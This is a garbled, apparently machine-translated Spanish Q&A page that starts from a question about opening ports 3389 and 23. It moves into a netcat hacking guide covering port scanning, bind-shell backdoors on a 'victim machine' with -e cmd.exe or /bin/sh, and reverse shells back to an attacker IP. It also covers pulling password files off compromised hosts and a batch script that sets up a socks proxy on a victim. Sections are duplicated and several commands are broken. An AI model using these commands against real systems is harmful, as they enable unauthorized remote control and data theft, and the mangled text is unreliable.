Cómo activar 3389
Categoría: Computadora/Red gt; Software
Descripción del problema:
Por favor, dígame cómo abrir 3389 y cómo cerrarlo. abra el puerto 23 y cierre el puerto 23.
Análisis:
Utilice la navaja suiza - cat
Formato de comando: nc -l -p el puerto que desea open
En cuanto al uso de nc, debes usarlo en el directorio donde se encuentra cmd Swiss Army Knife
Otro uso:
NC, un necesario arma para piratas informáticos, se llama "navaja suiza". Esto muestra lo poderosa que es la función.
Comparando el servicio tel.exe de win2000 de Microsoft y el servicio tlntsvr.exe de Microsoft, puede verlo al conectarse. >
1.1 NC.EXE es un programa cliente de teléfono no estándar,
1.2 también tiene un programa cliente putty.exe, que proporciona cuatro modos de conexión
-raw - tel -rlogin -ssh.
Aunque hay una nueva versión GUI del "NC" chino, ésta es aún más fácil de usar en comparación.
######################################### ## #######################
2. Información de ayuda de Netcat 1.10 para NT
# #### ############################################ ###### #############
C: WINDOWSDesktopgt; nc -h
[v1.10 NT]
conectarse a algún lugar : nc [-opciones] nombre de host puerto[s] [puertos] ...
escucha entrante: nc -l -p puerto [opciones] [nombre de host] [puerto]
opciones:
-d desconectar de la consola, modo en segundo plano (modo en segundo plano)
-e programar el programa entrante para ejecutarlo [¡¡peligroso!!]
-g puerta de enlace punto[s] de salto de enrutamiento de origen, hasta 8
-G num puntero de enrutamiento de origen: 4, 8, 12, ...
- h this cruft (esta ayuda información)
-i intervalo de retraso en segundos para líneas enviadas, puertos escaneados (tiempo de retraso)
-l modo de escucha, para conexiones entrantes (modo de escucha, conexión en espera)
-L escucha con más atención, vuelve a escuchar al cerrar el socket (continúa escuchando después de cerrar la conexión)
-n direcciones IP solo numéricas, sin DNS (modo numérico de IP, análisis sin DNS) )
-o archivo de volcado de tráfico hexadecimal (archivo de salida en modo hexadecimal, tres secciones)
-p puerto número de puerto local (puerto local)
p>
-r aleatoriza puertos locales y remotos (puertos locales y remotos aleatorios)
-s addr dirección de origen local (dirección de origen local)
-t responder negociación TELNET
p>
-u modo UDP
-v verbose [use ice para ser más detallado] (-vv más información)
-w tiempo de espera de segundos para conexiones y lecturas finales
-z modo de E/S cero [usado para escaneo] (modo de escaneo, -vv)
los números de puerto pueden ser individuales o rangos: m-n [inclusive]
#
################################################ ## #################
3. Formatos de comando de uso común de Netcat 1.10
######### ## ################################################# #######
3.1. Sondeo de puertos:
nc -vv ip port
RIVER [192.168.0.198] 19190 (?) open Muestra ya sea abierto
3.2. Escáner
nc -vv -w 5 puerto ip-puerto
nc -vv -z puerto ip-puerto
Dicho escaneo dejará muchos rastros, los administradores del sistema tendrán mucho cuidado
3.3 Puerta trasera
máquina víctima: máquina de la víctima
nc -. l -p puerto -e cmd.exe win2000
nc -l -p puerto -e /bin/sh unix, linux
máquina del atacante: máquina del atacante
nc ip -p port se conecta a victim_IP y obtiene un shell.
3.2. Escáner
nc -vv -w 5 puerto ip-puerto puerto
nc -vv -z puerto ip-puerto puerto
Dicho escaneo dejará muchos rastros y los administradores del sistema tendrán mucho cuidado
3.3 Puerta trasera
máquina víctima: máquina de la víctima
nc -l. -p puerto -e cmd.exe win2000
nc -l -p puerto -e /bin/sh unix, linux
máquina del atacante: máquina del atacante
p>.nc ip -p port se conecta a victim_IP y obtiene un shell.
3.4. Conexión inversa
Máquina atacante: normalmente sql2.exe, desbordamiento remoto, ataque webdavx3.exe
O conexión inversa de wolff. >
nc -vv -l -p puerto
máquina víctima:
nc -e cmd.exe ip del atacante -p puerto
nc -e /bin/sh ip del atacante -p puerto
O:
máquina del atacante:
nc -vv -l -p puerto1 /*para Enter*/
nc -vv -l -p prot2 /*para visualización*/
máquina víctima:
nc attacker_ip puerto1 cmd.exe nc attacker_ip puerto2
nc attacker_ip port1 /bin/sh nc attacker_ip port2
139 requiere el parámetro -s (nc.exe -L -p 139 -d -e cmd.exe -s la IP de la máquina de la otra parte)
Esto garantiza que nc.exe tenga prioridad sobre NETBIOS.
3.5. Transferir archivos:
3.5.1 máquina atacante lt; - la máquina víctima arrastra el archivo de contraseña desde el broiler
nc -d -l -p pathfiledest; /* máquina*/ puede ser ejecutada por shell
nc -vv attacker_ip port gt; pathfile.txt /*máquina víctima*/ necesita Ctrl C para salir
El asador necesita el cmd .exe del atacante de la interfaz gráfica de usuario Ejecutar (iniciar sesión en el terminal, no es tan conveniente como instalar FTP). De lo contrario, no hay forma de ingresar Crl C.
3.5.2 máquina --gt; carga el archivo de comando al asador
atacante nc - vv -l -p port gt; pathfile.txt /*victim machine*/ requiere Ctrl C para salir
nc -d victim_ip port lt; pathfiledest /*attacker machine*/ puede ser ejecutado por shell
Esto es mejor. Iniciamos sesión en la terminal e invadimos otros broilers. Podemos elegir el modo shell para iniciar sesión.
Conclusión: los archivos Ascii y bin se pueden transferir. Los archivos de programa se pueden transferir
Pregunta: Después de conectarse a una IP, una vez completada la transferencia, debe enviar Ctrl C para salir de nc. exe.
O solo puede conectarse nuevamente y usar pskill.exe para finalizar el proceso. ¿Pero se libera el identificador abierto por el archivo transferido?
3.6 Captura de paquetes de datos del puerto. /p>
nc -vv -w 2 -o test.txt hackervip 80 21-15
lt; ****** ***** 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Error de sintaxis
lt; *********** 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , mand "" unr
lt; *********** 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # reconocido...
lt; *********** 83 00 00 01 8f# .....
3.7 tel, procesamiento automático por lotes.
nc victim_ip port lt; pathfile.cmd /*victim machine*/ muestra el proceso de ejecución
nc -vv victim_ip port lt; el proceso de ejecución
nc -d victim_ip port lt; pathfile.cmd modo silencioso
_______________file.cmd________________________
contraseña
echo []=[windir]
c:
cd
md prueba
cd /d windirsystem32
detener sksockserver
serpiente.exe -config puerto 11111
iniciar sksockserver
salir